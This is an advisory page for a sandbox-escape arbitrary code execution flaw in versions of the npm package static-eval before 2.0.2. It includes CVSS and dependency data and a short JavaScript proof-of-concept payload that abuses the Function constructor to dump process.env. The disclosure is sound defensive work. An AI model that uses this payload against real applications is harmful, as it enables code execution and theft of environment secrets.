Ecosyste.ms: Advisories

An open API service providing security vulnerability metadata for many open source software ecosystems.

Security Advisories: MDE2OlNlY3VyaXR5QWR2aXNvcnlHSFNBLXg5aGMtcnczNS1mNDRo

Sandbox Breakout / Arbitrary Code Execution in static-eval

Versions of static-evalprior to 2.0.2 pass untrusted user input directly to the global function constructor, resulting in an arbitrary code execution vulnerability when user input is parsed via the package.

Proof of concept

var evaluate = require('static-eval');
var parse = require('esprima').parse;

var src = process.argv[2];
var payload = '(function({x}){return x.constructor})({x:"".sub})("console.log(process.env)")()'
var ast = parse(payload).body[0].expression;
console.log(evaluate(ast, {x:1}));

Recommendation

Upgrade to version 2.0.2 or later.

Permalink: https://github.com/advisories/GHSA-x9hc-rw35-f44h
JSON: https://advisories.ecosyste.ms/api/v1/advisories/MDE2OlNlY3VyaXR5QWR2aXNvcnlHSFNBLXg5aGMtcnczNS1mNDRo
Source: GitHub Advisory Database
Origin: Unspecified
Severity: High
Classification: General
Published: over 3 years ago
Updated: over 1 year ago

CVSS Score: 7.3
CVSS vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

Identifiers: GHSA-x9hc-rw35-f44h
References:

Blast Radius: 37.4

Affected Packages

npm:static-eval

Dependent packages: 109
Dependent repositories: 132,071
Downloads: 14,120,948 last month
Affected Version Ranges: <= 2.0.1
Fixed in: 2.0.2
All affected versions: 0.0.0, 0.1.0, 0.1.1, 0.2.0, 0.2.1, 0.2.2, 0.2.3, 0.2.4, 1.0.0, 1.1.0, 1.1.1, 2.0.0, 2.0.1
All unaffected versions: 2.0.2, 2.0.3, 2.0.4, 2.0.5, 2.1.0, 2.1.1